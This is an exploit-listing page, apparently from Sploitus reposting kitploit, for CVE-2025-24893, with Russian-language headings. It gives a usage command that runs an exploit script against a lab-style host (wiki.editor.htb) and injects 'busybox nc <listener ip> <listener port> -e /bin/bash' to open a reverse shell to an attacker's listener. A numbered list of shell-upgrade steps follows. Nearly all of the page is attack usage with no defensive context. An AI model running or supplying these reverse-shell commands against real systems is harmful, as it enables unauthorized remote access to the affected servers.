Sploitus

Exploit for CVE-2025-24893

kitploit · 2026-09-01

Exploit Code

MARKDOWN17 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ANDWATI-CVE-2025-24893
# Обратная оболочка для CVE-2025-24893

root@kitploit:~
    
    
     python3 CVE-2025-24893.py  -u http://wiki.editor.htb/ -c "busybox nc <listener ip> <listener port> -e /bin/bash"
    

## Улучшение оболочки

  1. `python3 -c 'import pty; pty.spawn("/bin/bash")'`
  2. `ctrl + z`
  3. `stty size`
  4. `stty raw -echo; fg`
  5. `stty rows x columns y`
  6. `export TERM=xterm`